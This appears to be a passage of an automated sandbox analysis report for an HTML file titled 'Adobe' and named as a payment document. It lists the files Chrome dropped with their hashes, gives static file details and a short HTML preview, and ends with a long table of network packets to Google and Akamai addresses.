Preview:	L..................F.@.. ...$+.,....{i...\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0126188718850635
Encrypted:	false
SSDEEP:	48:8xfOd5ThVsHOidAKZdA14tseh7sFiZUkmgqeh7s4y+BX:8xYHPnSy
MD5:	CC266D2642AC06A715B6EB84C11F0AAC
SHA1:	4A20AC2AC7B40C9AF6F46B39F0E181C04D4293F0
SHA-256:	368C7193D10E7EE3BAB22E752F76BBDEF3C2119DFF744739F84A131EE42678FE
SHA-512:	E7ED090A646D61ADE1229815C66F83AA4D1866E0DF3D4583258B96C94FA411077D2F3DAECD37BD6845AE715991CC04F2FE6F61034C4864F4A42867DB85DDAD41
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:32 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9985022173207145
Encrypted:	false
SSDEEP:	48:8lOd5ThVxHOidAKZdA1vehDiZUkwqehqy+R:86HDQy
MD5:	13470FDC1065BC0D79472D3CAF57D0F9
SHA1:	D38FD0B47842CE8056CB2D9F0BC318D008FD9F72
SHA-256:	E80C1E74B8A8B0D239D07CBFAF9A0119B22821F25A3FC85237FE09BEB48C4FB1
SHA-512:	D846845550B7F471AED294A6E0661F66F14A5020E0831041D80B4E8321E8B05FDF49359AF764F608CA86894AFBB67DB3944AF827FFDD6F3D86496D6F9BA6F810
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....&....\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9876508803389323
Encrypted:	false
SSDEEP:	48:8UOd5ThVxHOidAKZdA1hehBiZUk1W1qehcy+C:8rHT98y
MD5:	814CFFF7BC7D4FC53D0EC4F74D8C245B
SHA1:	43D9A685EA4371E0B4F8B5F37ABBB04DA6B7F779
SHA-256:	3C2802D0CD3ACC1B4F69B86A290C1D6B6FEA397BDE0AED3222D999B4D16CD185
SHA-512:	833C1B92ADEE57844827DBDA83DC2CB11527AE1D0E4989D2644711418D28581EB6D1539753331F312D51164DE6C98E43AE13D3371F00FB6F56B6CB126E6C285B
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 2 08:28:32 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9993072803338943
Encrypted:	false
SSDEEP:	48:8iOd5ThVxHOidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbSy+yT+:8FHDT/TbxWOvTbSy7T
MD5:	F5AD993E25E52748B0E07D95DB586818
SHA1:	24F1502B0B860F4070804FE0E3BEFB3792F0A1E3
SHA-256:	FE097036E1B4F0904EC218BACA8F31F8426571ADB298DE3C1DC43933CB6E3447
SHA-512:	40AE9A4D5FEDACA71612A8C98AC01CFB9FDEB0BCAD74F23F63A58CEDE4E0D513F6FA3109306B98882A57A2DA44E72744F6E99BDE8EBAFAFAEC50D2FAA0968BE8
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....R...\..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I"Z.K....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V"Z.K....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V"Z.K....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V"Z.K..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V"Z.K...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2160 x 2160, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	52776
Entropy (8bit):	7.162855847228631
Encrypted:	false
SSDEEP:	768:ixYqNcv/OYTvIXo78/r1s/LQir52jtLgGig4xO9KLlXK4vDQAAxbwBTHIO3ZPxI+:iETv6oYG/8QoBgGwxv5lDQAOETDdxrAE
MD5:	1EA40CED761036F097D5ABB9B0C50DB9
SHA1:	DC2AB8515BC376B7A0E2BF485057A18AE66C6FFA
SHA-256:	AFC646B4BDBFA9B9B9D17AE28C4BBA6275DA4EE24E95404EC76DB411F9EDCEB8
SHA-512:	DB3BCAEA699066D161E5F29E2BFEF262B9354997CA74846E7D5A2826EC56FE70FE971810E69F8F14D5B814FB0B5C5A7B508ED77EDB47A2C63C5F3B8C216EEE39
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...p...p........>....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...Al..}...b..L.......h.Z#.[....i.i.d..mj.,...JE;.Rr.%=..J....D....H.....DK..(..C....i..<...^....KS..~....?...!...8.....y........C.O=................A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P......

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2160 x 2160, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	52776
Entropy (8bit):	7.162855847228631
Encrypted:	false
SSDEEP:	768:ixYqNcv/OYTvIXo78/r1s/LQir52jtLgGig4xO9KLlXK4vDQAAxbwBTHIO3ZPxI+:iETv6oYG/8QoBgGwxv5lDQAOETDdxrAE
MD5:	1EA40CED761036F097D5ABB9B0C50DB9
SHA1:	DC2AB8515BC376B7A0E2BF485057A18AE66C6FFA
SHA-256:	AFC646B4BDBFA9B9B9D17AE28C4BBA6275DA4EE24E95404EC76DB411F9EDCEB8
SHA-512:	DB3BCAEA699066D161E5F29E2BFEF262B9354997CA74846E7D5A2826EC56FE70FE971810E69F8F14D5B814FB0B5C5A7B508ED77EDB47A2C63C5F3B8C216EEE39
Malicious:	false
Reputation:	low
URL:	https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png
Preview:	.PNG........IHDR...p...p........>....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...Al..}...b..L.......h.Z#.[....i.i.d..mj.,...JE;.Rr.%=..J....D....H.....DK..(..C....i..<...^....KS..~....?...!...8.....y........C.O=................A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P...............A...... ..........................T..............@@P........*.......A...... ..........................T..............@@P......

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (303)
Entropy (8bit):	4.589177039119844
TrID:	HyperText Markup Language (15015/1) 20.56% HyperText Markup Language (12001/1) 16.44% HyperText Markup Language (12001/1) 16.44% HyperText Markup Language (11501/1) 15.75% HyperText Markup Language (11501/1) 15.75%
File name:	Payment_00372_26-12-2024.html
File size:	5'909 bytes
MD5:	eb5666e02c87df8dfd6d0b25a0ea5e17
SHA1:	addf219a3f1fabafa88e1293f3570abe9e627c66
SHA256:	0292c04d2d424c5a5e207bca888fa649bc139c145c6bd5898457485157c5ac74
SHA512:	c7ce203a16edcb3176d3d943480e28cf115ecc37508d3ac9b680a0e3e8b700841012d1a1ada6f82531be554f88bf72347b6f6c66d784b9f068651673ae58c12c
SSDEEP:	96:Si8HAZBXYJN0bRpVOyJBNR/O3Cs4qPiE2OSUAuxqYgPPD:p8HoVm9yJBNR+CsFPiE2hpuxJSPD
TLSH:	E2C1759379E208262A4390B93696A7483624E017D749DE5A3FCD12B98FC5BD948773C8
File Content Preview:	<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Adobe</title>. <style>. /* Body styling with the provided background image */. body {

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 10:28:24.500828028 CET	49674	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:24.500845909 CET	49675	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:24.594575882 CET	49673	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:32.351366997 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:32.351411104 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:32.351479053 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:32.351696014 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:32.351706982 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:32.640568018 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:32.640620947 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:32.640700102 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:32.641175985 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:32.641189098 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.082323074 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.082606077 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.082626104 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.082987070 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.082999945 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.083065987 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.083072901 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.083120108 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.083694935 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.084826946 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.084889889 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.085139036 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.085144043 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.171647072 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.356636047 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.356823921 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.356843948 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.357223988 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.357239962 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.357300997 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.357309103 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.357326984 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.357362032 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.357959986 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.373963118 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.374044895 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.472965002 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.472990990 CET	443	49710	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.527896881 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.527941942 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.528031111 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.528050900 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.530704021 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.531382084 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.531388044 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.537020922 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.539244890 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.539251089 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.543319941 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.547347069 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.547353029 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.549561977 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.551188946 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.551194906 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.555970907 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.559348106 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.559354067 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.562335014 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.563282967 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.563288927 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.568552971 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.571157932 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.571163893 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.585674047 CET	49710	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.616276026 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.617095947 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.617147923 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.617161036 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.617171049 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.617206097 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.623570919 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.627109051 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.627115965 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.629837036 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.631165981 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.631174088 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.636061907 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.639681101 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.639695883 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.642422915 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.643429995 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.643439054 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.648677111 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.651120901 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.651129007 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.654989958 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.655031919 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.655039072 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.661262035 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.661314011 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.661320925 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.667131901 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.667191982 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.667198896 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.672657967 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.672775030 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.672785044 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.677966118 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.678034067 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.678040028 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.678101063 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.678181887 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.678616047 CET	49707	443	192.168.2.5	172.217.16.193
Jan 2, 2025 10:28:33.678634882 CET	443	49707	172.217.16.193	192.168.2.5
Jan 2, 2025 10:28:33.695435047 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:33.695468903 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:33.695534945 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:33.696024895 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:33.696046114 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.245157957 CET	49675	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:34.245203972 CET	49673	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:34.267832041 CET	49674	443	192.168.2.5	23.1.237.91
Jan 2, 2025 10:28:34.325316906 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.343596935 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.343628883 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.344175100 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.344192982 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.344250917 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.344259977 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.344326973 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.344933033 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.346870899 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.346941948 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.347141981 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.347157001 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.502764940 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.761080980 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.761126041 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.761183023 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.761205912 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.763767004 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.763823032 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.763834000 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.770134926 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.770220041 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.770226955 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.775326967 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.775408030 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.775417089 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.781593084 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.781651974 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.781661987 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.787940979 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.788005114 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.788014889 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.794131041 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.794188976 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.794203043 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.800477982 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.800529957 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.800539017 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.847625017 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.847686052 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.847696066 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.850235939 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.850291967 CET	49713	443	192.168.2.5	142.250.186.65
Jan 2, 2025 10:28:34.850300074 CET	443	49713	142.250.186.65	192.168.2.5
Jan 2, 2025 10:28:34.856430054 CET	443	49713	142.250.186.65	192.168.2.5
